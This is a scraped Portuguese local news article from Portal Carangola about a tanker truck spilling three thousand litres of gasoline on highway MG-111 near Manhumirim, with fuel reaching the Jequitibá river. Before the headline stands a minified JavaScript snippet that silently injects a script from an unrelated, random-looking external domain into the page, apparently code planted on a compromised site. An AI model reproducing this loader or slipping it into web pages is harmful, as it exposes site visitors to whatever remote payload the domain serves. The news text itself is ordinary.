;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Três mil litros de gasolina vazam de caminhão-tanque-MG111 - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Três mil litros de gasolina vazam de caminhão-tanque-MG111

Três mil litros de gasolina vazaram de um caminhão-tanque na rodovia estadual MG 111, no trecho do contorno pela cidade de Manhumirim. O vazamento aconteceu início da noite desta terça-feira (27). A válvula de um dos tanques se rompeu e o combustível escorreu pela rodovia até alcançar o rio Jequitibá.

De acordo com as informações do condutor do veículo Carlos José Cândido, de 34 anos, ele transitava sentido Alto Jequitibá a Manhumirim. No instante que passou em um dos quebra-molas, ouviu um estouro muito alto. A seguir, outro veículo o ultrapassou e o condutor lhe avisou que estava vazando combustível na pista.

Ele percorreu cerca de 350 metros até parar e desceu para averiguar o que ocorreu. A válvula de um compartimento estourou e três mil litros de gasolina derramaram na pista. Uma pequena parte escoou por um bueiro.

O trânsito chegou a ser limitado no trecho durante mais de uma hora. “Devido à evaporação do combustível, efetuamos limpeza no tanque, jogando água sobre o caminhão e dentro do reservatório”, completou o Sargento Dias, do Corpo de Bombeiros de Manhuaçu, que foi acionado juntamente com sua equipe para auxiliar no controle do risco de explosão.

O fato foi comunicado a Policia Militar Ambiental de Alto Caparaó. O veículo foi liberado após os trabalhos realizados.

Com informações e imagens de Jailton Pereira – Portal Caparaó

Ofertas


Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.